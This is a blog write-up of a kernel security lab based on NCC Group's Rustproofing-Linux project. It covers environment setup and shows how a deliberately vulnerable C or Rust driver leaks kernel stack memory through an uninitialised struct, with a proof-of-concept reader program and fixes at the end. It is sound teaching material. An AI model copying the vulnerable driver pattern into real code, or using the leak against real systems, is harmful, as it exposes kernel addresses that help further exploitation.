跳到主要内容

Rustproofing - Leaking Addresses

· 阅读需 6 分钟
Muel - Nova
Anime Would PWN This WORLD into 2D
🤖AI Summary

在本文中,作者 nova 详细介绍了如何在 Linux 内核版本 6.1 中利用 Rust 支持来进行内核漏洞利用(Kernel PWN)。文章内容主要涵盖了环境设置、漏洞演示以及修复方法。

首先,作者描述了项目环境的准备步骤,包括创建项目目录、获取 Rust-for-Linux 的最新代码提交,并确保所有依赖项已正确安装。作者还介绍了虚拟化工具 virtme 的使用方法,以便于运行一个虚拟化的 Linux 内核。

在实际演示中,作者展示了如何编译内核和驱动程序,并成功地生成了驱动模块和相关的 ELF 文件。之后,作者通过一个简单的 PoC 代码来演示如何利用未初始化的内核栈变量泄露内核内存地址。

接下来,作者展示了在 C 语言和 Rust 两种语言下的具体实现,说明了如何在 C 代码中初始化一个未完全填充的结构体,从而导致内核内容泄露。而在 Rust 代码中,作者使用了 unsafe 关键字来进行类似操作,但强调了 Rust 的 unsafe 标记能提醒程序员注意潜在的安全问题。

最后,作者提供了一些修复方法,如取消设置 CONFIG_INIT_STACK_NONE=y 或启用 CONFIG_INIT_STACK_ALL_ZERO=y,以及在初始化结构体之前使用 memset 或 Rust 中的 MaybeUninit 来确保成员变量被正确初始化。

本文通过详细的步骤和示例代码,帮助读者理解在不同环境下如何利用和防止内核内存地址泄露的问题。

import Link from '@docusaurus/Link';

This is actually the very first time I dig into Kernel PWN LOL

Since Kernel Version 6.1, Rust support has been merged into Linux.

Environment

We first create a new directory for this project.

mkdir rustproofing-linux
cd rustproofing-linux

rustproofing-linux

This is the source code of our exploit

git clone https://github.com/nccgroup/rustproofing-linux.git

Rust-for-Linux

The source code of Rust-for-linux, we checkout to the latest commit for stability.

git clone https://github.com/Rust-for-Linux/linux rust-for-linux # 4G around
cd rust-for-linux
git checkout bd123471269354fdd504b65b1f1fe5167cb555fc # latest commit at the point of writing
cd ..

But before that, make sure all the dependencies are installed.

See linux/quick-start.rst at rust · Rust-for-Linux/linux for details.

备注

In my case, I installed lld, llvm, clang using APT

sudo apt install ldd llvm clang -y

rust using

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source "$HOME/.cargo/env"

rustc using

cd rust-for-linux
rustup override set $(scripts/min-tool-version.sh rustc)
rustup default 1.62.0 # I can't compile without this one, otherwise it will still use my 1.67 version rustc.

bindgen using cargo.

cargo install --locked --version $(scripts/min-tool-version.sh bindgen) bindgen

then, try

make LLVM=1 rustavailable

if Rust is available! pops up, you're all set.

virtme

信息

Virtme is a set of simple tools to run a virtualized Linux kernel that uses the host Linux distribution or a simple rootfs instead of a whole disk image.

For convenience, we build virtme up.

simply clone it, and we're done.

git clone https://github.com/amluto/virtme

-watchdog is deprecated in qemu 7.2.0, modify it to -device i6300esb -action watchdog=pause .

vim ..virtme/virtme/architectures.py
    @staticmethod
def qemuargs(is_native):
ret = Arch.qemuargs(is_native)

# Add a watchdog. This is useful for testing.
ret.extend(['-device', 'i6300esb', '-action', 'watchdog=pause'])
""" Modified from `ret.extend(['-watchdog', 'i6300esb'])`"""

if is_native and os.access('/dev/kvm', os.R_OK):
# If we're likely to use KVM, request a full-featured CPU.
# (NB: if KVM fails, this will cause problems. We should probe.)
ret.extend(['-cpu', 'host']) # We can't migrate regardless.

return ret

Compile the kernels

cd rust-for-linux
mkdir `pwd`.out
cp ../rustproofing-linux/configs/config-base `pwd`.out/.config
KBUILD_OUTPUT=`pwd`.out make -j$(nproc) LLVM=1
备注

We have some settings in config-base

CONFIG_INIT_STACK_NONE=y
# CONFIG_INIT_STACK_ALL_PATTERN is not set
# CONFIG_INIT_STACK_ALL_ZERO is not set

which disable automatic stack variable initialisation

image-20230217154242780

compile drivers

in rustproofing-linux folder

make

If everything goes well, which means, your previous environments built perfectly., you should be able to see *.ko files in this folder and ELF files in poc folder.

Congratulations! The environment is set.

This takes me more than 5 hours though lol

备注

If you edited PoC or driver's source code, use this line to update the PoC / driver

make LLVM=1 KDIR=../rust-for-linux.out clean && make LLVM=1 KDIR=../rust-for-linux.out

start virtme

../virtme/virtme-run --kdir `pwd`/../rust-for-linux.out --show-command --show-boot-console --mods=auto -a "kasan_multi_shot" --qemu-opts -cpu core2duo -m 1G -smp 2

use PoC

in PoC folder, we have a file called test.sh which allows us to test our PoC

usage:

test.sh module_name[fixed]
# equals to
# insmod ../vuln_printk_leak.ko
# ./poc_vuln_printk_leak
# rmmod ../vuln_printk_leak.ko

example:

test.sh vuln_printk_leak

Leaking stack contents

While CONFIG_INIT_STACK_NONE=y is set, we can actually leak kernel memory address by initializing a struct without filling all of its members.

Let's load an example driver to demonstrate this. ( in C )

struct vuln_info {
u8 version;
u64 id;
u8 _reserved;
};

#define VULN_GET_INFO _IOR('v', 2, struct vuln_info)


static long vuln_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
struct vuln_info info;

switch (cmd) {
case VULN_GET_INFO:
info = (struct vuln_info) {
.version = 1,
.id = 0x1122334455667788,
};
if (copy_to_user((void __user *)arg, &info, sizeof(info)) != 0)
return -EFAULT;
return 0;
}

pr_err("error: wrong ioctl command: %#x\n", cmd);
return -EINVAL;
}

We have defined a struct with 3 members but have only initialized 2 of its members.

And now let's see our PoC.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>


#define u8 unsigned char
#define u64 unsigned long long

struct vuln_info {
u8 version;
u64 id;
u8 _reserved;
};

#define VULN_GET_INFO _IOR('v', 2, struct vuln_info)


int main(int argc, char **argv)
{
int fd = open("/dev/vuln_stack_leak", O_RDWR);
if (fd < 0) {
perror("open error");
return -1;
}

struct vuln_info info = { 0 };

if (ioctl(fd, VULN_GET_INFO, &info) < 0)
perror("ioctl");

struct vuln_info expected;
memset(&expected, 0, sizeof(expected));
expected = (struct vuln_info) {
.version = 1,
.id = 0x1122334455667788,
};

int i;
u64 *info_ptr = (u64*)&info;
u64 *exp_ptr = (u64*)&expected;
for (i=0; i<sizeof(info)/sizeof(u64); i++) {
if (info_ptr[i] != exp_ptr[i]) {
printf("value at offset %ld differs: %#llx vs %#llx\n", i*sizeof(u64), info_ptr[i], exp_ptr[i]);
}
}

return 0;
}

It is interesting to explain how we interact with driver, but we'll talk it in later.

now, let's take a look at how this driver will leak our kernel memory.

image-20230224132905008

our version was set to 1, but because the struct was not filled with 0 at initial, it actually contains some of the kernel info, and it is leaked while we're copying the struct to user space.

image-20230224133211571

In Rust

I'm not familiar with Rust, let alone Kernel Rust.

But we can still extract the relevant code from it.

#[repr(C)] // same struct layout as in C, since we are sending it to userspace
struct VulnInfo {
version: u8,
id: u64,
_reserved: u8,
}

match cmd {
VULN_GET_INFO => {
let info = VulnInfo {
version: 1,
id: 0x1122334455667788,
_reserved: 0, // compiler requires an initialiser
};

// pointer weakening coercion + cast
let info_ptr = &info as *const _ as *const u8;
// SAFETY: "info" is declared above and is local
unsafe { writer.write_raw(info_ptr, size_of_val(&info))? };

In short, We just simply use unsafe writer.write_raw to replace copy_to_user function in C.

write_raw is unsafe as we programmer have to guarantee the pointer is safe, which is something that we won't make here.

Let's try our PoC again

image-20230224134458315

However, comparing with C version, the Rust Version contains unsafe flag to notice our driver programmers to think twice before writing this vulnerable code.

Fixes To This

This problem can be fixed pretty easily:

  • We can unset CONFIG_INIT_STACK_NONE=y or set CONFIG_INIT_STACK_ALL_ZERO=y to let the compiler to fulfill it automatically.

  • Simply using memset before initializing our struct

    In Rust, we can use MaybeUninit porting variation,

    simply add let mut info = MaybeUninit::<VulnInfo>::zeroed(); before initailizing

Reference

Rustproofing Linux (Part 1/4 Leaking Addresses) – NCC Group Research

Loading Comments...